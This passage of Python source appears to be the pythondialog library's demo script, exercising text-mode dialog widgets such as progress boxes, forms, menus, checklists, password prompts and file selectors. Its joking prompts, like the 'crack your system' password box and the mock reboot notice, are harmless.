self.form_demo()
# Almost identical to passwordbox
self.passwordform_demo()
def dialog_version_check(self, version_string, feature="", *, start="",
explain=False):
if d.compat != "dialog":
# non-dialog implementations are not affected by
# 'dialog_version_check'.
return True
minimum_version = DialogBackendVersion.fromstring(version_string)
res = (d.cached_backend_version >= minimum_version)
if explain and not res:
self.too_old_dialog_version(feature=feature, start=start,
min=version_string)
return res
def too_old_dialog_version(self, feature="", *, start="", min=None):
assert (feature and not start) or (not feature and start), \
(feature, start)
if not start:
start = "Skipping {0},".format(feature)
d.msgbox(
"{start} because it requires dialog {min} or later; "
"however, it appears that you are using version {used}.".format(
start=start, min=min, used=d.cached_backend_version),
width=60, height=9, title="Demo skipped")
def progressbox_demo_with_filepath(self):
widget = "progressbox"
# First, ask the user for a file (possibly FIFO)
d.msgbox(self.FIFO_HELP(widget), width=72, height=20)
path = self.fselect_demo(widget, allow_FIFOs=True,
title="Please choose a file to be shown as "
"with 'tail -f'")
if path is None:
# User chose to abort
return
else:
d.progressbox(file_path=path,
text="You can put some header text here",
title="Progressbox example with a file path")
def progressboxoid(self, widget, func_name, text, **kwargs):
# Since this is just a demo, I will not try to catch os.error exceptions
# in this function, for the sake of readability.
read_fd, write_fd = os.pipe()
child_pid = os.fork()
if child_pid == 0:
try:
# We are in the child process. We MUST NOT raise any exception.
# No need for this one in the child process
os.close(read_fd)
# Python file objects are easier to use than file descriptors.
# For a start, you don't have to check the number of bytes
# actually written every time...
# "buffering = 1" means wfile is going to be line-buffered
with os.fdopen(write_fd, mode="w", buffering=1) as wfile:
for line in text.split('\n'):
wfile.write(line + '\n')
time.sleep(0.02 if params["fast_mode"] else 1.2)
os._exit(0)
except:
os._exit(127)
# We are in the father process. No need for write_fd anymore.
os.close(write_fd)
# Call d.progressbox() if widget == "progressbox"
# d.programbox() if widget == "programbox"
# etc.
getattr(d, widget)(
fd=read_fd,
title="{0} example with a file descriptor".format(widget),
**kwargs)
# Now that the progressbox is over (second child process, running the
# dialog-like program), we can wait() for the first child process.
# Otherwise, we could have a deadlock in case the pipe gets full, since
# dialog wouldn't be reading it.
exit_info = os.waitpid(child_pid, 0)[1]
if os.WIFEXITED(exit_info):
exit_code = os.WEXITSTATUS(exit_info)
elif os.WIFSIGNALED(exit_info):
d.msgbox("%s(): first child process terminated by signal %d" %
(func_name, os.WTERMSIG(exit_info)))
else:
assert False, "How the hell did we manage to get here?"
if exit_code != 0:
d.msgbox("%s(): first child process ended with exit status %d"
% (func_name, exit_code))
def progressbox_demo_with_file_descriptor(self):
func_name = "progressbox_demo_with_file_descriptor"
text = """\
A long time ago in a galaxy far,
far away...
A NEW HOPE
It was a period of intense
sucking. Graphical toolkits for
Python were all nice and clean,
but they were, well, graphical.
And as every one knows, REAL
PROGRAMMERS ALWAYS WORK ON VT-100
TERMINALS. In text mode.
Besides, those graphical toolkits
were usually too complex for
simple programs, so most FLOSS
geeks ended up writing
command-line tools except when
they really needed the full power
of mainstream graphical toolkits,
such as Qt, GTK+ and wxWidgets.
But... thanks to people like
Thomas E. Dickey, there are now
at our disposal several free
software command-line programs,
such as dialog, that allow easy
building of graphically-oriented
interfaces in text-mode
terminals. These are good for
tasks where line-oriented
interfaces are not well suited,
as well as for the increasingly
common type who runs away as soon
as he sees something remotely
resembling a command line.
But this is not for Python! I want
my poney!
Seeing this unacceptable
situation, Robb Shecter had the
idea, back in the olden days of
Y2K (when the world was supposed
to suddenly collapse, remember?),
to wrap a dialog interface into a
Python module called dialog.py.
pythondialog was born. Florent
Rougon, who was looking for
something like that in 2002,
found the idea rather cool and
improved the module during the
following years...""" + 15*'\n'
return self.progressboxoid("progressbox", func_name, text)
def programbox_demo(self):
func_name = "programbox_demo"
text = """\
The 'progressbox' widget
has a little brother
called 'programbox'
that displays text
read from a pipe
and only adds an OK button
when the pipe indicates EOF
(End Of File).
This can be used
to display the output
of some external program.
This will be done right away if you choose "Yes" in the next dialog.
This choice will cause 'find /usr/bin' to be run with subprocess.Popen()
and the output to be displayed, via a pipe, in a 'programbox' widget."""
self.progressboxoid("programbox", func_name, text)
if d.Yesno("Do you want to run 'find /usr/bin' in a programbox widget?"):
try:
devnull = subprocess.DEVNULL
except AttributeError: # Python < 3.3
devnull_context = devnull = open(os.devnull, "wb")
else:
devnull_context = DummyContextManager()
args = ["find", "/usr/bin"]
with devnull_context:
p = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=devnull, close_fds=True)
# One could use title=... instead of text=... to put the text
# in the title bar.
d.programbox(fd=p.stdout.fileno(),
text="Example showing the output of a command "
"with programbox")
retcode = p.wait()
# Context manager support for subprocess.Popen objects requires
# Python 3.2 or later.
p.stdout.close()
return retcode
else:
return None
def infobox_demo(self):
d.infobox("One moment, please. Just wasting some time here to "
"show you the infobox...")
time.sleep(0.5 if params["fast_mode"] else 4.0)
def gauge_demo(self):
d.gauge_start("Progress: 0%", title="Still testing your patience...")
for i in range(1, 101):
if i < 50:
d.gauge_update(i, "Progress: {0}%".format(i), update_text=True)
elif i == 50:
d.gauge_update(i, "Over {0}%. Good.".format(i),
update_text=True)
elif i == 80:
d.gauge_update(i, "Yeah, this boring crap will be over Really "
"Soon Now.", update_text=True)
else:
d.gauge_update(i)
time.sleep(0.01 if params["fast_mode"] else 0.1)
d.gauge_stop()
def mixedgauge_demo(self):
for i in range(1, 101, 20):
d.mixedgauge("This is the 'text' part of the mixedgauge\n"
"and this is a forced new line.",
title="'mixedgauge' demo",
percent=int(round(72+28*i/100)),
elements=[("Task 1", "Foobar"),
("Task 2", 0),
("Task 3", 1),
("Task 4", 2),
("Task 5", 3),
("", 8),
("Task 6", 5),
("Task 7", 6),
("Task 8", 7),
("", ""),
# 0 is the dialog special code for
# "Succeeded", so these must not be equal to
# zero! That is why I made the range() above
# start at 1.
("Task 9", -max(1, 100-i)),
("Task 10", -i)])
time.sleep(0.5 if params["fast_mode"] else 2)
def yesno_demo(self, with_help=True):
if not with_help:
# Simple version, without the "Help" button (the return value is
# True or False):
return d.Yesno("\nDo you like this demo?", yes_label="Yes, I do",
no_label="No, I do not", height=10, width=40,
title="An Important Question")
# 'yesno' dialog box with custom Yes, No and Help buttons
while True:
reply = d.Yesnohelp("\nDo you like this demo?",
yes_label="Yes, I do", no_label="No, I do not",
help_label="Please help me!", height=10,
width=60, title="An Important Question")
if reply == "yes":
return True
elif reply == "no":
return False
elif reply == "help":
d.msgbox("""\
I can hear your cry for help, and would really like to help you. However, I \
am afraid there is not much I can do for you here; you will have to decide \
for yourself on this matter.
Keep in mind that you can always rely on me. \
You have all my support, be brave!""",
height=15, width=60,
title="From Your Faithful Servant")
else:
assert False, "Unexpected reply from MyDialog.Yesnohelp(): " \
+ repr(reply)
def msgbox_demo(self, answer):
if answer:
msg = "Excellent! Press OK to see its source code (or another " \
"file if not in the correct directory)."
else:
msg = "Well, feel free to send your complaints to /dev/null!\n\n" \
"Sincerely yours, etc."
d.msgbox(msg, width=50)
def textbox_demo(self):
# Better use the absolute path for displaying in the dialog title
filepath = os.path.abspath(__file__)
code = d.textbox(filepath, width=76,
title="Contents of {0}".format(filepath),
extra_button=True, extra_label="Stop it now!")
if code == "extra":
d.msgbox("Your wish is my command, Master.", width=40,
title="Exiting")
sys.exit(0)
def inputbox_demo(self):
code, answer = d.inputbox("What's your name?", init="Snow White")
return answer
def inputbox_demo_with_help(self):
init_str = "Snow White"
while True:
code, answer = d.inputbox("What's your name?", init=init_str,
title="'inputbox' demo", help_button=True)
if code == "help":
d.msgbox("Help from the 'inputbox' demo. The string entered "
"so far is {0!r}.".format(answer),
title="'inputbox' demo")
init_str = answer
else:
break
return answer
def form_demo(self):
elements = [
("Size (cm)", 1, 1, "175", 1, 20, 4, 3),
("Weight (kg)", 2, 1, "85", 2, 20, 4, 3),
("City", 3, 1, "Groboule-les-Bains", 3, 20, 15, 25),
("State", 4, 1, "Some Lost Place", 4, 20, 15, 25),
("Country", 5, 1, "Nowhereland", 5, 20, 15, 20),
("My", 6, 1, "I hereby declare that, upon leaving this "
"world, all", 6, 20, 0, 0),
("Very", 7, 1, "my fortune shall be transferred to Florent "
"Rougon's", 7, 20, 0, 0),
("Last", 8, 1, "bank account number 000 4237 4587 32454/78 at "
"Banque", 8, 20, 0, 0),
("Will", 9, 1, "Cantonale Vaudoise, Lausanne, Switzerland.",
9, 20, 0, 0) ]
code, fields = d.form("Please fill in some personal information:",
elements, width=77)
return fields
def form_demo_with_help(self, item_help=True):
# This function is slightly complex because it provides help support
# with 'help_status=True', and optionally also with 'item_help=True'
# together with 'help_tags=True'. For a very simple version (without
# any help support), see form_demo() above.
minver_for_helptags = "1.2-20130902"
if item_help:
if self.dialog_version_check(minver_for_helptags):
complement = """'item_help=True' is also used in conjunction \
with 'help_tags=True' in order to display per-item help at the bottom of the \
widget."""
else:
item_help = False
complement = """'item_help=True' is not used, because to make \
it consistent with the 'item_help=False' case, dialog {min} or later is \
required (for the --help-tags option); however, it appears that you are using \
version {used}.""".format(min=minver_for_helptags,
used=d.cached_backend_version)
else:
complement = """'item_help=True' is not used, because it has \
been disabled; therefore, there is no per-item help at the bottom of the \
widget."""
text = """\
This is a demo for the 'form' widget, which is similar to 'mixedform' but \
a bit simpler in that it has no notion of field type (to hide contents such \
as passwords).
This demo uses 'help_button=True' to provide a Help button \
and 'help_status=True' to allow redisplaying the widget in the same state \
when leaving the help dialog. {complement}""".format(complement=complement)
elements = [ ("Fruit", 1, 8, "mirabelle plum", 1, 20, 18, 30),
("Color", 2, 8, "yellowish", 2, 20, 18, 30),
("Flavor", 3, 8, "sweet when ripe", 3, 20, 18, 30),
("Origin", 4, 8, "Lorraine", 4, 20, 18, 30) ]
more_kwargs = {}
if item_help:
more_kwargs.update({ "item_help": True,
"help_tags": True })
elements = [ list(l) + [ "Help text for item {0}".format(i+1) ]
for i, l in enumerate(elements) ]
while True:
code, t = d.form(text, elements, height=20, width=65,
title="'form' demo with help facilities",
help_button=True, help_status=True, **more_kwargs)
if code == "help":
label, status, elements = t
d.msgbox("You asked for help concerning the field labelled "
"{0!r}.".format(label), width=50)
else:
# 't' contains the list of items as filled by the user
break
answers = '\n'.join(t)
d.msgbox("Your answers:\n\n{0}".format(indent(answers, " ")),
width=0, height=0,
title="'form' demo with help facilities", no_collapse=True)
return t
def mixedform_demo(self):
HIDDEN = 0x1
READ_ONLY = 0x2
elements = [
("Size (cm)", 1, 1, "175", 1, 20, 4, 3, 0x0),
("Weight (kg)", 2, 1, "85", 2, 20, 4, 3, 0x0),
("City", 3, 1, "Groboule-les-Bains", 3, 20, 15, 25, 0x0),
("State", 4, 1, "Some Lost Place", 4, 20, 15, 25, 0x0),
("Country", 5, 1, "Nowhereland", 5, 20, 15, 20, 0x0),
("My", 6, 1, "I hereby declare that, upon leaving this "
"world, all", 6, 20, 54, 0, READ_ONLY),
("Very", 7, 1, "my fortune shall be transferred to Florent "
"Rougon's", 7, 20, 54, 0, READ_ONLY),
("Last", 8, 1, "bank account number 000 4237 4587 32454/78 at "
"Banque", 8, 20, 54, 0, READ_ONLY),
("Will", 9, 1, "Cantonale Vaudoise, Lausanne, Switzerland.",
9, 20, 54, 0, READ_ONLY),
("Read-only field...", 10, 1, "... that doesn't go into the "
"output list", 10, 20, 0, 0, 0x0),
("\/3r`/ 53kri7 (0d3", 11, 1, "", 11, 20, 15, 20, HIDDEN) ]
code, fields = d.mixedform(
"Please fill in some personal information:", elements, width=77)
return fields
def passwordform_demo(self):
elements = [
("Secret field 1", 1, 1, "", 1, 20, 12, 0),
("Secret field 2", 2, 1, "", 2, 20, 12, 0),
("Secret field 3", 3, 1, "Providing a non-empty initial content "
"(like this) for an invisible field can be very confusing!",
3, 20, 30, 160)]
code, fields = d.passwordform(
"Please enter all your secret passwords.\n\nOn purpose here, "
"nothing is echoed when you type in the passwords. If you want "
"asterisks, use the 'insecure' keyword argument as in the "
"passwordbox demo.",
elements, width=77, height=15, title="Passwordform demo")
d.msgbox("Secret password 1: '%s'\n"
"Secret password 2: '%s'\n"
"Secret password 3: '%s'" % tuple(fields),
width=60, height=20, title="The Whole Truth Now Revealed")
return fields
def menu_demo(self, name, city, state, country, size, weight, secret_code,
last_will1, last_will2, last_will3, last_will4):
text = """\
Hello, %s from %s, %s, %s, %s cm, %s kg.
Thank you for giving us your Very Secret Code '%s'.
As expressly stated in the previous form, your Last Will reads: "%s"
All that was very interesting, thank you. However, in order to know you \
better and provide you with the best possible customer service, we would \
still need to know your favorite day of the week. Please indicate your \
preference below.""" \
% (name, city, state, country, size, weight, secret_code,
' '.join([last_will1, last_will2, last_will3, last_will4]))
code, tag = d.menu(text, height=23, width=76,
choices=[("Monday", "Being the first day of the week..."),
("Tuesday", "Comes after Monday"),
("Wednesday", "Before Thursday day"),
("Thursday", "Itself after Wednesday"),
("Friday", "The best day of all"),
("Saturday", "Well, I've had enough, thanks"),
("Sunday", "Let's rest a little bit")])
return tag
def menu_demo_with_help(self):
text = """Sample 'menu' dialog box with help_button=True and \
item_help=True."""
while True:
code, tag = d.menu(text, height=16, width=60,
choices=[("Tag 1", "Item 1", "Help text for item 1"),
("Tag 2", "Item 2", "Help text for item 2"),
("Tag 3", "Item 3", "Help text for item 3"),
("Tag 4", "Item 4", "Help text for item 4"),
("Tag 5", "Item 5", "Help text for item 5"),
("Tag 6", "Item 6", "Help text for item 6"),
("Tag 7", "Item 7", "Help text for item 7"),
("Tag 8", "Item 8", "Help text for item 8")],
title="A menu with help facilities",
help_button=True, item_help=True, help_tags=True)
if code == "help":
d.msgbox("You asked for help concerning the item identified by "
"tag {0!r}.".format(tag), height=8, width=40)
else:
break
d.msgbox("You have chosen the item identified by tag "
"{0!r}.".format(tag), height=8, width=40)
def checklist_demo(self):
# We could put non-empty items here (not only the tag for each entry)
code, tags = d.checklist(text="What sandwich toppings do you like?",
height=15, width=54, list_height=7,
choices=[("Catsup", "", False),
("Mustard", "", False),
("Pesto", "", False),
("Mayonnaise", "", True),
("Horse radish","", True),
("Sun-dried tomatoes", "", True)],
title="Do you prefer ham or spam?",
backtitle="And now, for something "
"completely different...")
return tags
SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST = [
("Tag 1", "Item 1", True, "Help text for item 1"),
("Tag 2", "Item 2", False, "Help text for item 2"),
("Tag 3", "Item 3", False, "Help text for item 3"),
("Tag 4", "Item 4", True, "Help text for item 4"),
("Tag 5", "Item 5", True, "Help text for item 5"),
("Tag 6", "Item 6", False, "Help text for item 6"),
("Tag 7", "Item 7", True, "Help text for item 7"),
("Tag 8", "Item 8", False, "Help text for item 8") ]
def checklist_demo_with_help(self):
text = """Sample 'checklist' dialog box with help_button=True, \
item_help=True and help_status=True."""
choices = self.SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST
while True:
code, t = d.checklist(text, height=0, width=0, list_height=0,
choices=choices,
title="A checklist with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True)
if code == "help":
tag, selected_tags, choices = t
d.msgbox("You asked for help concerning the item identified "
"by tag {0!r}.".format(tag), height=7, width=60)
else:
# 't' contains the list of tags corresponding to checked items
break
s = '\n'.join(t)
d.msgbox("The tags corresponding to checked items are:\n\n"
"{0}".format(indent(s, " ")), height=15, width=60,
title="'checklist' demo with help facilities",
no_collapse=True)
def radiolist_demo(self):
choices = [
("Hamburger", "2 slices of bread, a steak...", False),
("Hotdog", "doesn't bite any more", False),
("Burrito", "no se lo que es", False),
("Doener", "Huh?", False),
("Falafel", "Erm...", False),
("Bagel", "Of course!", False),
("Big Mac", "Ah, that's easy!", True),
("Whopper", "Erm, sorry", False),
("Quarter Pounder", 'called "le Big Mac" in France', False),
("Peanut Butter and Jelly", "Well, that's your own business...",
False),
("Grilled cheese", "And nothing more?", False) ]
while True:
code, t = d.radiolist(
"What's your favorite kind of sandwich?", width=68,
choices=choices, help_button=True, help_status=True)
if code == "help":
# Prepare to redisplay the radiolist in the same state as it
# was before the user pressed the Help button.
tag, selected, choices = t
d.msgbox("You asked for help about something called {0!r}. "
"Sorry, but I am quite incompetent in this matter."
.format(tag))
else:
# 't' is the chosen tag
break
return t
def rangebox_demo(self):
nb = 10 # initial value
while True:
code, nb = d.rangebox("""\
How many Microsoft(TM) engineers are needed to prepare such a sandwich?
You can use the Up and Down arrows, Page Up and Page Down, Home and End keys \
to change the value; you may also use the Tab key, Left and Right arrows \
and any of the 0-9 keys to change a digit of the value.""",
min=1, max=20, init=nb,
extra_button=True, extra_label="Joker")
if code == "ok":
break
elif code == "extra":
d.msgbox("Well, {0} may be enough. Or not, depending on the "
"phase of the moon...".format(nb))
else:
assert False, "Unexpected Dialog exit code: {0!r}".format(code)
return nb
def buildlist_demo(self):
items0 = [("A Monty Python DVD", False),
("A Monty Python script", False),
('A DVD of "Barry Lyndon" by Stanley Kubrick', False),
('A DVD of "The Good, the Bad and the Ugly" by Sergio Leone',
False),
('A DVD of "The Trial" by Orson Welles', False),
('The Trial, by Franz Kafka', False),
('Animal Farm, by George Orwell', False),
('Notre-Dame de Paris, by Victor Hugo', False),
('Les Misérables, by Victor Hugo', False),
('Le Lys dans la Vallée, by Honoré de Balzac', False),
('Les Rois Maudits, by Maurice Druon', False),
('A Georges Brassens CD', False),
("A book of Georges Brassens' songs", False),
('A Nina Simone CD', False),
('Javier Vazquez y su Salsa - La Verdad', False),
('The last Justin Bieber album', False),
('A printed copy of the Linux kernel source code', False),
('A CD player', False),
('A DVD player', False),
('An MP3 player', False)]
# Use the name as tag, item string and item-help string; the item-help
# will be useful for long names because it is displayed in a place
# that is large enough to avoid truncation. If not using
        # item_help=True, then the last element of each tuple must be omitted.
items = [ (tag, tag, status, tag) for (tag, status) in items0 ]
text = """If you were stranded on a desert island, what would you \
take?
Press the space bar to toggle the status of an item between selected (on \
the left) and unselected (on the right). You can use the TAB key or \
^ and $ to change the focus between the different parts of the widget.
(this widget is called with item_help=True and visit_items=True)"""
code, l = d.buildlist(text, items=items, visit_items=True,
item_help=True,
title="A simple 'buildlist' demo")
return l
def buildlist_demo_with_help(self):
text = """Sample 'buildlist' dialog box with help_button=True, \
item_help=True, help_status=True, and visit_items=False.
Keys: SPACE select or deselect the highlighted item, i.e.,
move it between the left and right lists
^ move the focus to the left list
$ move the focus to the right list
TAB move focus
ENTER press the focused button"""
items = self.SAMPLE_DATA_FOR_BUILDLIST_AND_CHECKLIST
while True:
code, t = d.buildlist(text, height=0, width=0, list_height=0,
items=items,
title="A 'buildlist' with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True,
no_collapse=True)
if code == "help":
tag, selected_tags, items = t
d.msgbox("You asked for help concerning the item identified "
"by tag {0!r}.".format(tag), height=7, width=60)
else:
# 't' contains the list of tags corresponding to selected items
break
s = '\n'.join(t)
d.msgbox("The tags corresponding to selected items are:\n\n"
"{0}".format(indent(s, " ")), height=15, width=60,
title="'buildlist' demo with help facilities",
no_collapse=True)
def calendar_demo(self):
code, date = d.calendar("When do you think Georg Cantor was born?")
return date
def calendar_demo_with_help(self):
# Start with the current date
day, month, year = -1, -1, -1
while True:
code, date = d.calendar("When do you think Georg Cantor was born?",
day=day, month=month, year=year,
title="'calendar' demo",
help_button=True)
if code == "help":
day, month, year = date
d.msgbox("Help dialog for date {0:04d}-{1:02d}-{2:02d}.".format(
year, month, day), title="'calendar' demo")
else:
break
return date
def comment_on_Cantor_date_of_birth(self, day, month, year):
complement = """\
For your information, Georg Ferdinand Ludwig Philip Cantor, a great \
mathematician, was born on March 3, 1845 in Saint Petersburg, and died on \
January 6, 1918. Among other things, Georg Cantor laid the foundation for \
the set theory (which is at the basis of most modern mathematics) \
and was the first person to give a rigorous definition of real numbers."""
if (year, month, day) == (1845, 3, 3):
return "Spot-on! I'm impressed."
elif year == 1845:
return "You guessed the year right. {0}".format(complement)
elif abs(year-1845) < 30:
return "Not too far. {0}".format(complement)
else:
return "Well, not quite. {0}".format(complement)
def timebox_demo(self):
# Get the current time (to display initially in the timebox)
tm = time.localtime()
init_hour, init_min, init_sec = tm.tm_hour, tm.tm_min, tm.tm_sec
# tm.tm_sec can be 60 or even 61 according to the doc of the time module!
init_sec = min(59, init_sec)
code, (hour, minute, second) = d.timebox(
"And at what time, if I may ask?",
hour=init_hour, minute=init_min, second=init_sec)
return (hour, minute, second)
def passwordbox_demo(self):
# 'insecure' keyword argument only asks dialog to echo asterisks when
# the user types characters. Not *that* bad.
code, password = d.passwordbox("What is your root password, "
"so that I can crack your system "
"right now?", insecure=True)
return password
def scrollbox_demo(self, name, favorite_day, toppings, sandwich,
nb_engineers, desert_island_stuff, date, time_,
password):
tw71 = textwrap.TextWrapper(width=71, break_long_words=False,
break_on_hyphens=True)
if nb_engineers is not None:
sandwich_comment = " (the preparation of which requires, " \
"according to you, {nb_engineers} MS {engineers})".format(
nb_engineers=nb_engineers,
engineers="engineers" if nb_engineers != 1 else "engineer")
else:
sandwich_comment = ""
sandwich_report = "Favorite sandwich: {sandwich}{comment}".format(
sandwich=sandwich, comment=sandwich_comment)
if desert_island_stuff is None:
# The widget was not available, the user didn't see anything.
desert_island_string = ""
else:
if len(desert_island_stuff) == 0:
desert_things = " nothing!"
else:
desert_things = "\n\n " + "\n ".join(desert_island_stuff)
desert_island_string = \
"\nOn a desert island, you would take:{0}\n".format(
desert_things)
day, month, year = date
hour, minute, second = time_
msg = """\
Here are some vital statistics about you:
Name: {name}
Favorite day of the week: {favday}
Favorite sandwich toppings:{toppings}
{sandwich_report}
{desert_island_string}
Your answer about Georg Cantor's date of birth: \
{year:04d}-{month:02d}-{day:02d}
(at precisely {hour:02d}:{min:02d}:{sec:02d}!)
{comment}
Your root password is: ************************** (looks good!)""".format(
name=name, favday=favorite_day,
toppings="\n ".join([''] + toppings),
sandwich_report=tw71.fill(sandwich_report),
desert_island_string=desert_island_string,
year=year, month=month, day=day,
hour=hour, min=minute, sec=second,
comment=tw71.fill(
self.comment_on_Cantor_date_of_birth(day, month, year)))
d.scrollbox(msg, height=20, width=75, title="Great Report of the Year")
TREEVIEW_BASE_TEXT = """\
This is an example of the 'treeview' widget{options}. Nodes are labelled in a \
way that reflects their position in the tree, but this is not a requirement: \
you are free to name them the way you like.
Node 0 is the root node. It has 3 children tagged 0.1, 0.2 and 0.3. \
You should now select a node with the space bar."""
def treeview_demo(self):
code, tag = d.treeview(self.TREEVIEW_BASE_TEXT.format(options=""),
nodes=[ ("0", "node 0", False, 0),
("0.1", "node 0.1", False, 1),
("0.2", "node 0.2", False, 1),
("0.2.1", "node 0.2.1", False, 2),
("0.2.1.1", "node 0.2.1.1", True, 3),
("0.2.2", "node 0.2.2", False, 2),
("0.3", "node 0.3", False, 1),
("0.3.1", "node 0.3.1", False, 2),
("0.3.2", "node 0.3.2", False, 2) ],
title="'treeview' demo")
d.msgbox("You selected the node tagged {0!r}.".format(tag),
title="treeview demo")
return tag
def treeview_demo_with_help(self):
text = self.TREEVIEW_BASE_TEXT.format(
options=" with help_button=True, item_help=True and "
"help_status=True")
nodes = [ ("0", "node 0", False, 0, "Help text 1"),
("0.1", "node 0.1", False, 1, "Help text 2"),
("0.2", "node 0.2", False, 1, "Help text 3"),
("0.2.1", "node 0.2.1", False, 2, "Help text 4"),
("0.2.1.1", "node 0.2.1.1", True, 3, "Help text 5"),
("0.2.2", "node 0.2.2", False, 2, "Help text 6"),
("0.3", "node 0.3", False, 1, "Help text 7"),
("0.3.1", "node 0.3.1", False, 2, "Help text 8"),
("0.3.2", "node 0.3.2", False, 2, "Help text 9") ]
while True:
code, t = d.treeview(text, nodes=nodes,
title="'treeview' demo with help facilities",
help_button=True, item_help=True,
help_tags=True, help_status=True)
if code == "help":
# Prepare to redisplay the treeview in the same state as it
# was before the user pressed the Help button.
tag, selected_tag, nodes = t
d.msgbox("You asked for help about the node with tag {0!r}."
.format(tag))
else:
# 't' is the chosen tag
break
d.msgbox("You selected the node tagged {0!r}.".format(t),
title="'treeview' demo")
return t
def editbox_demo(self, filepath):
if os.path.isfile(filepath):
code, text = d.editbox(filepath, 20, 60,
title="A Cheap Text Editor")
d.scrollbox(text, title="Resulting text")
else:
d.msgbox("Skipping the first part of the 'editbox' demo, "
"as '{0}' can't be found.".format(filepath),
title="'msgbox' demo")
l = ["In the previous dialog, the initial contents was",
"explicitly written to a file. With Dialog.editbox_str(),",
"you can provide it as a string and pythondialog will",
"automatically create and delete a temporary file for you",
"holding this text for dialog.\n"] + \
[ "This is line {0} of a boring sample text.".format(i+1)
for i in range(100) ]
code, text = d.editbox_str('\n'.join(l), 0, 0,
title="A Cheap Text Editor")
d.scrollbox(text, title="Resulting text")
def inputmenu_demo(self):
choices = [ ("1st_tag", "Item 1 text"),
("2nd_tag", "Item 2 text"),
("3rd_tag", "Item 3 text") ]
for i in range(4, 21):
choices.append(("%dth_tag" % i, "Item %d text" % i))
while True:
code, tag, new_item_text = d.inputmenu(
"Demonstration of 'inputmenu'. Any single item can be either "
"accepted as is, or renamed.",
height=0, width=60, menu_height=10, choices=choices,
help_button=True, title="'inputmenu' demo")
if code == "help":
d.msgbox("You asked for help about the item with tag {0!r}."
.format(tag))
continue
elif code == "accepted":
text = "The item corresponding to tag {0!r} was " \
"accepted.".format(tag)
elif code == "renamed":
text = "The item corresponding to tag {0!r} was renamed to " \
"{1!r}.".format(tag, new_item_text)
else:
text = "Unexpected exit code from 'inputmenu': {0!r}.\n\n" \
"It may be a bug. Please report.".format(code)
break
d.msgbox(text, width=60, title="Outcome of the 'inputmenu' demo")
# Help strings used in several places
FSELECT_HELP = """\
Hint: the complete file path must be entered in the bottom field. One \
convenient way to achieve this is to use the SPACE bar when the desired file \
is highlighted in the top-right list.
As usual, you can use the TAB and arrow keys to move between controls. If in \
the bottom field, the SPACE key provides auto-completion."""
# The following help text was initially meant to be used for several
# widgets (at least progressbox and tailbox). Currently (dialog version
# 1.2-20130902), "dialog --tailbox" doesn't seem to work with FIFOs, so the
# "flexibility" of the help text is unused (another text is used when
# demonstrating --tailbox). However, this might change in the future...
def FIFO_HELP(self, widget):
return """\
For demos based on the {widget} widget, you may use a FIFO, also called \
"named pipe". This is a special kind of file, to which you will be able to \
easily append data. With the {widget} widget, you can see the data stream \
flow in real time.
To create a FIFO, you can use the command mkfifo(1), like this:
% mkfifo /tmp/my_shiny_new_fifo
Then, you can cat(1) data to the FIFO like this:
% cat >>/tmp/my_shiny_new_fifo
First line of text
Second line of text
...
You can end the input to cat(1) by typing Ctrl-D at the beginning of a \
line.""".format(widget=widget)
def fselect_demo(self, widget, init_path=None, allow_FIFOs=False, **kwargs):
init_path = init_path or params["home_dir"]
# Make sure the directory we chose ends with os.sep so that dialog
# shows its contents right away
if not init_path.endswith(os.sep):
init_path += os.sep
while True:
# We want to let the user quit this particular dialog with Cancel
# without having to bother choosing a file, therefore we use the
# original fselect() from dialog.Dialog and interpret the return
# code manually. (By default, the MyDialog class defined in this
# file intercepts the CANCEL and ESC exit codes and causes them to
# spawn the "confirm quit" dialog.)
code, path = self.Dialog_instance.fselect(
init_path, height=10, width=60, help_button=True, **kwargs)
# Display the "confirm quit" dialog if the user pressed ESC.
if not d.check_exit_request(code, ignore_Cancel=True):
continue
# Provide an easy way out...
if code == d.CANCEL:
path = None
break
elif code == "help":
d.msgbox("Help about {0!r} from the 'fselect' dialog.".format(
path), title="'fselect' demo")
init_path = path
elif code == d.OK:
# Of course, one can use os.path.isfile(path) here, but we want
# to allow regular files *and* possibly FIFOs. Since there is
# no os.path.is*** convenience function for FIFOs, let's go
# with os.stat.
try:
mode = os.stat(path)[stat.ST_MODE]
except os.error as e:
d.msgbox("Error: {0}".format(e))
continue
# Accept FIFOs only if allow_FIFOs is True
if stat.S_ISREG(mode) or (allow_FIFOs and stat.S_ISFIFO(mode)):
break
else:
if allow_FIFOs:
help_text = """\
You are expected to select a *file* here (possibly a FIFO), or press the \
Cancel button.\n\n%s
For your convenience, I will reproduce the FIFO help text here:\n\n%s""" \
% (self.FSELECT_HELP, self.FIFO_HELP(widget))
else:
help_text = """\
You are expected to select a regular *file* here, or press the \
Cancel button.\n\n%s""" % (self.FSELECT_HELP,)
d.msgbox(help_text, width=72, height=20)
else:
d.msgbox("Unexpected exit code from Dialog.fselect(): {0}.\n\n"
"It may be a bug. Please report.".format(code))
return path
def dselect_demo(self, init_dir=None):
init_dir = init_dir or params["home_dir"]
# Make sure the directory we chose ends with os.sep so that dialog
# shows its contents right away
if not init_dir.endswith(os.sep):
init_dir += os.sep
while True:
code, path = d.dselect(init_dir, 10, 50,
title="Please choose a directory",
help_button=True)
if code == "help":
d.msgbox("Help about {0!r} from the 'dselect' dialog.".format(
path), title="'dselect' demo")
init_dir = path
# When Python 3.2 is old enough, we'll be able to check if
# path.endswith(os.sep) and remove the trailing os.sep if this
# does not change the path according to os.path.samefile().
elif not os.path.isdir(path):
d.msgbox("Hmm. It seems that {0!r} is not a directory".format(
path), title="'dselect' demo")
else:
break
d.msgbox("Directory '%s' thanks you for choosing him." % path)
return path
def tailbox_demo(self, height=22, width=78):
widget = "tailbox"
# First, ask the user for a file.
# Strangely (dialog version 1.2-20130902 bug?), "dialog --tailbox"
# doesn't work with FIFOs: "Error moving file pointer in last_lines()"
# and DIALOG_ERROR exit status.
path = self.fselect_demo(widget, allow_FIFOs=False,
title="Please choose a file to be shown as "
"with 'tail -f'")
# Now, the tailbox
if path is None:
# User chose to abort
return
else:
d.tailbox(path, height, width, title="Tailbox example")
def pause_demo(self, seconds):
d.pause("""\
Ugh, sorry. pythondialog is still in development, and its advanced circuitry \
detected internal error number 0x666. That's a pretty nasty one, you know.
I am embarrassed. I don't know how to tell you, but we are going to have to \
reboot. In %d seconds.
Fasten your seatbelt...""" % seconds, height=18, seconds=seconds)
def process_command_line():
global params
try:
